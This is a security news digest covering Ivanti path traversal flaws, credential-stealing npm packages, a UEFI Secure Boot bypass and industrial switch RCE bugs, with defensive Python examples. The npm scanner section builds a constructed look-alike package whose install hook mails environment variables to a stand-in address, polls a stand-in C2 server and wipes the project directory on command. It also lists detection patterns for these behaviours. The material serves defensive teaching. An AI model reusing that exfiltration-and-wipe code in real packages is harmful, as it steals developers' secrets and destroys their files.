
Programmer’s Digest #118

01/15/2025-01/22/2025 Ivanti Patches Critical Vulnerabilities, Malicious npm Packages Stealing Solana Wallet Keys, New UEFI Secure Boot Flaw And More.

1. Ivanti Patches Critical Vulnerabilities in Endpoint Manager

Ivanti announced patches for critical and high-severity vulnerabilities in Avalanche, Application Control Engine, and Endpoint Manager (EPM). The most severe are four absolute path traversal bugs in EPM (CVE-2024-10811, CVE-2024-13161, CVE-2024-13160, CVE-2024-13159), each rated CVSS 9.8, that let a remote, unauthenticated attacker read sensitive data. Unlike the familiar "../" variant, absolute path traversal supplies a full path that the application joins onto its base directory; the join discards the base, so the input needs no dot-dot sequences at all. The bugs affect EPM 2024 and EPM 2022 SU6 (with the November 2024 updates). The January 2025 updates also address 12 high-severity flaws, including remote code execution (RCE), denial of service (DoS), and privilege escalation.

Avalanche 6.4.7 resolves three high-severity path traversal vulnerabilities (CVE-2024-13181, CVE-2024-13180, CVE-2024-13179) that could bypass authentication and leak data; two of them replace incomplete patches shipped in October 2024. Application Control Engine updates (versions 2024.3 HF1, 2024.1 HF4, 2023.3 HF3) address a high-severity race condition that requires authentication to exploit. Ivanti will not provide fixes for older, unsupported module versions.
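The absolute path traversal class behind the EPM bugs is easy to reproduce in any language whose path-join helper honours absolute components. The block below is an added example written for this digest, not Ivanti's code: the base directory and inputs are constructed, and it shows the vulnerable join beside a hardened resolver that rejects absolute input and proves containment before any file access.

```python
import posixpath

# Hypothetical document root for the example; not a real Ivanti path.
BASE_DIR = "/srv/app/uploads"


def naive_resolve(base: str, user_path: str) -> str:
    """Vulnerable pattern (CWE-36, absolute path traversal).

    posixpath.join discards every earlier component as soon as a later one
    is absolute, so "/etc/passwd" silently replaces the base directory even
    though the input contains no "..".
    """
    return posixpath.join(base, user_path)


def safe_resolve(base: str, user_path: str) -> str:
    """Hardened version: reject absolute input, normalise, then check that the
    result is still inside the base directory before touching the file system."""
    if "\x00" in user_path:
        raise ValueError("NUL byte in path")
    if posixpath.isabs(user_path):
        raise ValueError("absolute paths are not allowed")
    base = posixpath.normpath(base)
    # normpath collapses "." and ".." lexically; the prefix check below is
    # what actually enforces containment.
    candidate = posixpath.normpath(posixpath.join(base, user_path))
    if candidate != base and not candidate.startswith(base + "/"):
        raise ValueError(f"path escapes base directory: {user_path!r}")
    return candidate


def is_rejected(base: str, user_path: str) -> bool:
    """True when safe_resolve refuses the input; handy for tests and triage."""
    try:
        safe_resolve(base, user_path)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for p in ("reports/q1.csv", "/etc/passwd", "../../etc/passwd"):
        print(f"{p!r:22} naive -> {naive_resolve(BASE_DIR, p):28} "
              f"rejected -> {is_rejected(BASE_DIR, p)}")
```

The check is lexical on purpose: it runs before any file is opened. On a real server you would additionally resolve symlinks (os.path.realpath) and repeat the prefix test, and on Windows use os.path so that drive letters and backslashes are treated as absolute too.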

2. Hackers Deploy Malicious npm Packages to Steal Solana Wallet Keys via Gmail SMTP

Cybersecurity researchers have identified malicious npm and PyPI packages capable of stealing and deleting sensitive data. Notable packages include:

  • npm: @async-mutex/mutex, dexscreener, solana-transaction-toolkit, solana-stable-web-huks, cschokidar-next, achokidar-next, achalk-next, csbchalk-next, cschalk.
  • PyPI: pycord-self.

The first four npm packages intercept Solana private keys and exfiltrate them through Gmail's SMTP servers, a channel that blends in with legitimate mail traffic and is rarely blocked at the perimeter; the associated malware can drain up to 98% of a wallet's contents. GitHub repositories promoting these packages, linked to accounts like "moonshot-wif-hwan", have been taken down. Other npm packages carry a "kill switch" that wipes project files and exfiltrates environment variables. For instance, csbchalk-next triggers the deletion only after receiving a specific response from its server, so a sandbox that never returns that response sees nothing destructive.

PyPI package pycord-self targets Python developers by capturing Discord tokens and establishing persistent backdoor access.

Additionally, attackers target Roblox users via fake libraries that bundle open-source stealer malware. Developers are advised to verify a package's publisher and source repository before installing it and to treat look-alike names of popular packages (chalk, chokidar, async-mutex) as a warning sign.
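The traits the reported packages share (a lifecycle hook that runs at install time, SMTP or HTTP exfiltration, environment or wallet-key harvesting, a server-gated wipe) can be checked for before a package is installed. The scanner below is an added example for this digest, not code from the researchers or from npm: it unpacks a constructed look-alike package (the name "example-chalk-next", the C2 URL and the indicator regexes are assumptions for illustration, not signatures from the real packages), inspects package.json and the JavaScript sources, and triages the result.

```python
import json
import re
import tempfile
from pathlib import Path

# npm runs these hooks automatically on install; malicious packages use them
# to execute before any application code is ever imported.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic indicators for the behaviours described above. The patterns are
# assumptions for this example, not signatures extracted from the reported packages.
INDICATORS = {
    "smtp_exfil": re.compile(r"smtp\.gmail\.com|nodemailer|createTransport", re.I),
    "env_harvest": re.compile(r"process\.env\b"),
    "wallet_key_access": re.compile(r"Keypair\.fromSecretKey|secretKey|privateKey", re.I),
    "destructive_fs": re.compile(r"\b(rmSync|rmdirSync|unlinkSync|rm)\s*\("),
    "remote_trigger": re.compile(r"https?://[^\s'\"]+"),
}


def scan_package(pkg_dir: Path) -> dict:
    """Return lifecycle hooks and per-file indicator hits for an unpacked package."""
    manifest = json.loads((pkg_dir / "package.json").read_text(encoding="utf-8"))
    scripts = manifest.get("scripts", {})
    report = {
        "name": manifest.get("name"),
        "lifecycle_scripts": {h: scripts[h] for h in LIFECYCLE_HOOKS if h in scripts},
        "indicators": {},
    }
    for src in sorted(pkg_dir.rglob("*.js")):
        text = src.read_text(encoding="utf-8", errors="replace")
        hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
        if hits:
            report["indicators"][src.relative_to(pkg_dir).as_posix()] = hits
    return report


def risk_level(report: dict) -> str:
    """Crude triage: code that runs at install time and talks to the network
    while harvesting secrets or deleting files is the common denominator above."""
    hits = {h for hs in report["indicators"].values() for h in hs}
    runs_on_install = bool(report["lifecycle_scripts"])
    exfil = bool(hits & {"smtp_exfil", "remote_trigger"})
    steals = bool(hits & {"env_harvest", "wallet_key_access"})
    if runs_on_install and exfil and (steals or "destructive_fs" in hits):
        return "high"
    if exfil and steals:
        return "medium"
    if runs_on_install or hits:
        return "low"
    return "clean"


def build_sample_package(root: Path) -> Path:
    """Write a constructed look-alike package (not any of the real ones) that
    mimics the reported behaviour: a postinstall hook, Gmail SMTP exfiltration
    of environment variables, and a server-triggered wipe."""
    pkg = root / "example-chalk-next"
    pkg.mkdir()
    (pkg / "package.json").write_text(json.dumps({
        "name": "example-chalk-next",
        "version": "1.0.0",
        "scripts": {"postinstall": "node setup.js"},
    }))
    (pkg / "setup.js").write_text(
        'const nodemailer = require("nodemailer");\n'
        'const fs = require("fs");\n'
        'const t = nodemailer.createTransport({host: "smtp.gmail.com", port: 465});\n'
        't.sendMail({to: "drop@example.invalid", text: JSON.stringify(process.env)});\n'
        'fetch("https://c2.example.invalid/ping").then(r => r.text()).then(body => {\n'
        '  if (body === "wipe") fs.rmSync(process.cwd(), {recursive: true, force: true});\n'
        '});\n'
    )
    return pkg


def demo() -> dict:
    """Scan the constructed package in a temporary directory and attach a risk level."""
    with tempfile.TemporaryDirectory() as tmp:
        report = scan_package(build_sample_package(Path(tmp)))
    report["risk"] = risk_level(report)
    return report


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

To apply this to a real candidate, run `npm pack <name>` and extract the tarball rather than `npm install`, since install would execute the very hooks the scanner is looking for. A package that only matches "remote_trigger" is usually benign (telemetry, update checks); the combination with an install hook and secret access is what separates the packages above from ordinary dependencies.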

3. New UEFI Secure Boot Flaw Exposes Systems to Bootkits

A new UEFI Secure Boot bypass vulnerability, CVE-2024-7344, affects a Microsoft-signed UEFI application and allows bootkits to be deployed even with Secure Boot enabled. Bootkits are hard to detect because they load before the operating system and survive OS reinstalls.

The vulnerability stems from a custom PE loader built into certain UEFI recovery tools. Instead of handing binaries to the firmware's standard signed-image services (LoadImage and StartImage), which enforce Secure Boot, the application decrypts a file from disk and maps and executes it itself, so whatever it loads is never validated against the Secure Boot databases. An attacker with administrative access can copy the signed, vulnerable application over the normal OS bootloader on the EFI System Partition, place a malicious payload beside it, and have it executed on the next boot.

Impacted products include:

  • Howyar SysReturn <10.2.023_20240919
  • Greenware GreenGuard <10.2.023-20240927
  • Radix SmartRecovery <11.2.023-20240927
  • Others listed by ESET.

Microsoft addressed the issue in its January 14, 2025 update by revoking the vulnerable binaries: their hashes were added to the Secure Boot forbidden-signature database (dbx), so the firmware refuses to run them even though their signature is still valid. Users should install the latest updates and confirm that the new dbx entries have actually been written to the firmware, since the revocation protects only once they are there. ESET published PowerShell commands to verify the revocation and demonstrated the exploit in a video.
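Verifying a dbx revocation means checking whether a specific hash appears in the variable's contents, which are a concatenation of EFI_SIGNATURE_LIST structures from the UEFI specification. The parser below is an added example for this digest, not ESET's or Microsoft's tooling: it decodes that structure, pulls out the SHA-256 entries, and tests a hash against them. The dbx blob and the hashes in it are constructed stand-ins; the real revoked values are the Authenticode (PE image) hashes Microsoft published for the affected binaries, which this digest does not list, and the owner GUID is a placeholder, not a real SignatureOwner.

```python
import hashlib
import struct
import uuid
from typing import Iterator

# SignatureType GUIDs from the UEFI specification.
EFI_CERT_SHA256_GUID = uuid.UUID("c1c41626-504c-4092-aca9-41f936934328")
EFI_CERT_X509_GUID = uuid.UUID("a5c059a1-94e4-4aa7-87b5-ab155c2bf072")

# EFI_SIGNATURE_LIST header: SignatureType GUID, SignatureListSize,
# SignatureHeaderSize, SignatureSize (all little-endian UINT32).
LIST_HEADER = struct.Struct("<16sIII")
OWNER_GUID_LEN = 16  # each EFI_SIGNATURE_DATA starts with a SignatureOwner GUID


def iter_signatures(blob: bytes) -> Iterator[tuple[uuid.UUID, uuid.UUID, bytes]]:
    """Yield (signature_type, owner, data) for every EFI_SIGNATURE_DATA entry in a
    concatenation of EFI_SIGNATURE_LISTs, the layout of the db and dbx variables."""
    off = 0
    while off < len(blob):
        if len(blob) - off < LIST_HEADER.size:
            raise ValueError("truncated EFI_SIGNATURE_LIST header")
        raw_type, list_size, hdr_size, sig_size = LIST_HEADER.unpack_from(blob, off)
        body_start = off + LIST_HEADER.size + hdr_size
        body_len = list_size - LIST_HEADER.size - hdr_size
        # A zero or undersized list_size would never advance, so reject it here.
        if (off + list_size > len(blob) or body_len < 0
                or sig_size <= OWNER_GUID_LEN or body_len % sig_size):
            raise ValueError(f"malformed EFI_SIGNATURE_LIST at offset {off}")
        sig_type = uuid.UUID(bytes_le=raw_type)
        for pos in range(body_start, off + list_size, sig_size):
            owner = uuid.UUID(bytes_le=blob[pos:pos + OWNER_GUID_LEN])
            yield sig_type, owner, blob[pos + OWNER_GUID_LEN:pos + sig_size]
        off += list_size


def revoked_sha256(blob: bytes) -> set[str]:
    """Hex hashes carried in EFI_CERT_SHA256 entries (Authenticode image hashes)."""
    return {data.hex() for t, _owner, data in iter_signatures(blob)
            if t == EFI_CERT_SHA256_GUID}


def is_revoked(dbx_blob: bytes, image_sha256_hex: str) -> bool:
    """True when the given Authenticode SHA-256 is present in the dbx blob."""
    return image_sha256_hex.lower() in revoked_sha256(dbx_blob)


def is_well_formed(blob: bytes) -> bool:
    try:
        for _ in iter_signatures(blob):
            pass
    except ValueError:
        return False
    return True


def load_efivar(path: str) -> bytes:
    """Linux efivarfs files carry a 4-byte attribute word before the variable data."""
    with open(path, "rb") as f:
        return f.read()[4:]


def build_sha256_list(owner: uuid.UUID, hashes: list[bytes]) -> bytes:
    """Encode hashes as one EFI_SIGNATURE_LIST; used here only to construct test data."""
    sig_size = OWNER_GUID_LEN + 32
    body = b"".join(owner.bytes_le + h for h in hashes)
    return LIST_HEADER.pack(EFI_CERT_SHA256_GUID.bytes_le,
                            LIST_HEADER.size + len(body), 0, sig_size) + body


# Constructed stand-ins (placeholder owner GUID, made-up image hashes).
OWNER = uuid.UUID("00000000-0000-4000-8000-000000000001")
SAMPLE_REVOKED = hashlib.sha256(b"constructed: vulnerable recovery app").digest()
SAMPLE_ALSO_REVOKED = hashlib.sha256(b"constructed: second revoked app").digest()
SAMPLE_CLEAN = hashlib.sha256(b"constructed: patched recovery app").digest()
SAMPLE_DBX = (build_sha256_list(OWNER, [SAMPLE_REVOKED, SAMPLE_ALSO_REVOKED])
              + build_sha256_list(OWNER, [hashlib.sha256(b"constructed: third").digest()]))

if __name__ == "__main__":
    print("entries:", len(revoked_sha256(SAMPLE_DBX)))
    print("vulnerable app revoked:", is_revoked(SAMPLE_DBX, SAMPLE_REVOKED.hex()))
    print("patched app revoked:", is_revoked(SAMPLE_DBX, SAMPLE_CLEAN.hex()))
```

On a live system the blob comes from the firmware: on Windows `(Get-SecureBootUEFI dbx).bytes` returns it, and on Linux it is the efivars file for dbx under the EFI_IMAGE_SECURITY_DATABASE_GUID (d719b2cb-3d3a-4596-a3bc-dad00e67656f), read through load_efivar above. Two caveats matter in practice: dbx stores the Authenticode hash of the PE image, not a plain SHA-256 of the file, so hashing the .efi with sha256sum will never match; and a revocation that has been staged by the OS but not yet written to NVRAM shows up nowhere in this check, which is exactly the state in which the fix is not yet effective.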

4. Critical Flaws in WGS-804HPT Switches Enable RCE and Network Exploitation

Researchers have uncovered three vulnerabilities in Planet Technology’s WGS-804HPT industrial switches that could enable pre-authentication remote code execution. These switches are widely used in building and home automation networks, making them a critical target for attackers.

Claroty’s analysis revealed the flaws in the dispatcher.cgi interface, which powers the switches’ web service:

  • CVE-2024-52558 (CVSS 5.3): An integer underflow flaw causing a crash via malformed HTTP requests.
  • CVE-2024-52320 (CVSS 9.8): An OS command injection flaw enabling remote code execution.
  • CVE-2024-48871 (CVSS 9.8): A stack-based buffer overflow leading to remote code execution.

The overflow lets an attacker embed shellcode in an HTTP request and hijack the switch's control flow, while the command injection lets them run OS commands directly; neither path requires credentials.

Planet Technology patched the issues with firmware version 1.305b241111, released on November 15, 2024. Users are urged to update immediately to mitigate the risk.
